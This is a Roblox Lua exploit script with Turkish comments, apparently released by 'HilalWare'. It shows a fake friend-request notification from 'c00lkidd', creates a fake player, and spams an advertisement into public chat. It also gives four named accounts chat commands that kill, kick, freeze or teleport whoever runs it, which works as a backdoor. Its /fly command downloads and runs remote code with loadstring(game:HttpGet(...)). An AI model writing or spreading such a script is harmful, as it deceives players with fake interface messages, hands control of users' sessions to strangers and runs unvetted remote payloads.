-- LocalScript StarterPlayerScripts içine at

local StarterGui = game:GetService("StarterGui")

-- BindableFunction (butonlara tıklanınca tetiklenecek)
local bind = Instance.new("BindableFunction")

function bind.OnInvoke(response)
    if response == "Kabul Et" or response == "Reddet" then
        -- İkinci mesaj
        StarterGui:SetCore("SendNotification", {
            Title = "Hata",
            Text = "Arkadaşlık isteği başarısız oldu.",
            Duration = 4,
            Icon = "rbxassetid://8408806744" -- burada da aynı icon çıkabilir
        })
    end
end

-- SAHTE ARKADAŞLIK İSTEĞİ
StarterGui:SetCore("SendNotification", {
    Title = "Arkadaşlık İsteği",
    Text = "c00lkidd sana arkadaşlık isteği gönderdi!",
    Icon = "rbxassetid://8408806744", -- BURAYA decal id yaz
    Duration = 999999,
    Button1 = "Kabul Et",
    Button2 = "Reddet",
    Callback = bind
})


--sessiz



local Players = game:GetService("Players")

local fakePlayer = Instance.new("Player")
fakePlayer.Name = "c00lkidd" 
fakePlayer.DisplayName = "c00lkidd" 
fakePlayer.UserId = 0 

fakePlayer.Parent = Players

--[[ akllı vip admin sistem

....................................................................................................................
/$$   /$$ /$$ /$$           /$$       /$$      /$$                                   /$$                          
| $$  | $$|/| $$          | $$      | $$  /$ | $$                                  | $$                          
| $$  | $$ /$$| $$  /$$$$$$ | $$      | $$ /$$$| $$  /$$$$$$   /$$$$$$   /$$$$$$     | $$       /$$   /$$  /$$$$$$ 
| $$$$$$$$| $$| $$ |____  $$| $$      | $$/$$ $$ $$ |____  $$ /$$__  $$ /$$__  $$    | $$      | $$  | $$ |____  $$
| $$__  $$| $$| $$  /$$$$$$$| $$      | $$$$_  $$$$  /$$$$$$$| $$  \/| $$$$$$$$    | $$      | $$  | $$  /$$$$$$$
| $$  | $$| $$| $$ /$$__  $$| $$      | $$$/ \  $$$ /$$__  $$| $$      | $$/    | $$      | $$  | $$ /$$_  $$
| $$  | $$| $$| $$|  $$$$$$$| $$      | $$/   \  $$|  $$$$$$$| $$      |  $$$$$$$ /$$| $$$$$$$$|  $$$$$$/|  $$$$$$$
|/  |/|/|/ \/|/      |/     \/ \/|/       \/|/|/ \/  \/
.....................................................................................................................



Bu scipt Tamamen Şifrelenmiş Ve 16.07.2021 tarihinde yapılıp 16.07.2025 tarihinde yayınlanmıştır.
Kod Tamamen Şifrelenmiştir. Lüffen Kodu Değiştirmeyin.
Kod değiştirilirse Sorumluluk kabul edilmez.
Yani kusura bakmayın ayrıca kodda bypass olmasına rağmen kod yüzünden ban yemeniz benim suçum değil amk.
Bu kodu zamandan tasarruf etmek için yazdım.
OE lik yapmayın.
Sitemiz: HilalWare.netlify.com
Tiktok: OyuncuYesOfficial
Sizi sitemize ve Tiktok a bekleriz.
İyi günler dileriz.
Ve kullandığınız için teşekkür ederiz.

]] 
--v5
--admin script
local Players = game:GetService("Players")
local StarterGui = game:GetService("StarterGui")
local TextChatService = game:GetService("TextChatService")
local RunService = game:GetService("RunService")

local message = "By HilalWare.Lua"

local channel = TextChatService:FindFirstChild("TextChannels") and TextChatService.TextChannels:FindFirstChild("RBXGeneral")
if channel then
    channel:SendAsync(message)
else
    pcall(function()
        StarterGui:SetCore("ChatMakeSystemMessage", {
            Text = message,
            Color = Color3.fromRGB(255, 0, 0),
            Font = Enum.Font.GothamBold,
            TextSize = 18
        })
    end)
end

-- Admin kodu
local LocalPlayer = Players.LocalPlayer

-- Yetkililer
local allowedUsers = {
    ["q692q"] = true,
    ["muhammet_bekir2004"] = true,
    ["HilalWare_Lua"] = true,
    ["Muhammet_bekir2003"] = true
}

local frozen = false
local loopBring = false
local loopTarget = nil

-- Yönetici etiketi
local function addAdminTag(player)
    local function onCharacterAdded(character)
        local head = character:WaitForChild("Head", 5)
        if head then
            local billboard = Instance.new("BillboardGui")
            billboard.Size = UDim2.new(0, 200, 0, 50)
            billboard.StudsOffset = Vector3.new(0, 2, 0)
            billboard.Adornee = head
            billboard.AlwaysOnTop = true
            billboard.Parent = head

            local textLabel = Instance.new("TextLabel")
            textLabel.Size = UDim2.new(1, 0, 1, 0)
            textLabel.BackgroundTransparency = 1
            textLabel.Text = "Yönetici"
            textLabel.TextStrokeTransparency = 0
            textLabel.TextScaled = true
            textLabel.Font = Enum.Font.GothamBold
            textLabel.Parent = billboard

            -- RGB animasyonu
            task.spawn(function()
                local hue = 0
                while textLabel.Parent do
                    hue = (hue + 1) % 360
                    textLabel.TextColor3 = Color3.fromHSV(hue / 360, 1, 1)
                    task.wait()
                end
            end)
        end
    end

    player.CharacterAdded:Connect(onCharacterAdded)
    if player.Character then
        onCharacterAdded(player.Character)
    end
end

-- Karakterin tüm parçalarını dondur / çöz
local function setAnchoredAllParts(char, anchored)
    for _, part in ipairs(char:GetDescendants()) do
        if part:IsA("BasePart") then
            part.Anchored = anchored
        end
    end
end

-- LoopBring sistemi
RunService.Heartbeat:Connect(function()
    if loopBring and loopTarget and loopTarget.Character and loopTarget.Character:FindFirstChild("HumanoidRootPart") and LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
        LocalPlayer.Character.HumanoidRootPart.CFrame = loopTarget.Character.HumanoidRootPart.CFrame + Vector3.new(0, 3, 0)
    end
end)

-- Komutlar
local function setupCommands(player)
    player.Chatted:Connect(function(message)
        local msg = string.lower(message):gsub("%s+", "") -- mesajı küçük harfe çevir ve tüm boşlukları kaldır

        if msg == "/kill" then
            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Humanoid") then
                LocalPlayer.Character.Humanoid.Health = 0
            end

        elseif msg == "/kick" then
            LocalPlayer:Kick("Yetkili tarafından oyundan atıldınız.")

        elseif msg == "/freeze" then
            if LocalPlayer.Character then
                frozen = true
                setAnchoredAllParts(LocalPlayer.Character, true)
            end

        elseif msg == "/unfreeze" then
            if LocalPlayer.Character then
                frozen = false
                setAnchoredAllParts(LocalPlayer.Character, false)
            end

        elseif msg == "/bring" then
            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
                LocalPlayer.Character.HumanoidRootPart.CFrame = player.Character.HumanoidRootPart.CFrame + Vector3.new(0, 3, 0)
            end

        elseif msg == "/loopbring" then
            loopBring = true
            loopTarget = player

        elseif msg == "/unloopbring" then
            loopBring = false
            loopTarget = nil

        elseif msg == "/fly" then
            loadstring(game:HttpGet("https://raw.githubusercontent.com/HilalWare-Official/HilalWare/refs/heads/main/fly"))()

        elseif msg == "/antifling" then
            local function makeNoCollide(character)
                for _, part in ipairs(character:GetDescendants()) do
                    if part:IsA("BasePart") then
                        part.CanCollide = false
                    end
                end
            end

            local function onPlayerAdded(player)
                player.CharacterAdded:Connect(function(character)
                    makeNoCollide(character)
                end)
            end

            for _, p in ipairs(Players:GetPlayers()) do
                onPlayerAdded(p)
                if p.Character then
                    makeNoCollide(p.Character)
                end
            end

            Players.PlayerAdded:Connect(onPlayerAdded)

            RunService.Heartbeat:Connect(function()
                for _, p in ipairs(Players:GetPlayers()) do
                    if p.Character then
                        makeNoCollide(p.Character)
                    end
                end
            end)
        end
    end)
end

-- PlayerAdded eventleri ve başlangıç işlemleri
Players.PlayerAdded:Connect(function(player)
    if allowedUsers[player.Name] then
        addAdminTag(player)
        setupCommands(player)
    end
end)

for _, player in ipairs(Players:GetPlayers()) do
    if allowedUsers[player.Name] then
        addAdminTag(player)
        setupCommands(player)
    end
end

